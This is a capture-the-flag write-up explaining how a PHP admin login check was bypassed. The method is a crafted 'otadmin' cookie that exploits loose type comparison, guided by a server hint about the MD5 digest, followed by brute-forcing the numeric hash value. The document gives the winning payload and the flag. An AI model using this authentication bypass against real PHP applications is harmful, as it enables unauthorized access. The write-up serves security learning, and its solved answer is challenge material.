https://gameserver.zajebistyc.tf/admin/

Click the backup file and then we get php code.

We think about several ways to bypass it.
What we could know is we can post a cookie data named otadmin.

To bypass the first "if " which contains regex and the second one which contains "NULL" , we just post a cookie data like this: otadmin={"hash": 123}
The format of cookie data should follow this regex: {"hash": [0-9A-Z\"]+}

If we post a data like otadmin={'hash': '123'} or {'hash': 123}, the function

json_decode($_COOKIE['otadmin'], true)

will return 'NULL', then we can't bypass the second "if".

For bypassing the third "if", we try to brute force it. Before that we can get a hint from the server.

I CAN EVEN GIVE YOU A HINT XD 0006464640640064000646464640006400640640646400

We focus on this line:

echo(ord(MD5($cfg_pass)[$i]) & 0xC0);

If a character is "and" with 0xC0, it returns 0 when it is 0-9. Besides,
it returns 64 when it is a-z.

I used brupsuite to send requests. We get the flag when it posts:

otadmin={"hash": 389}

Congratulations! p4{wtf_php_comparisons_how_do_they_work}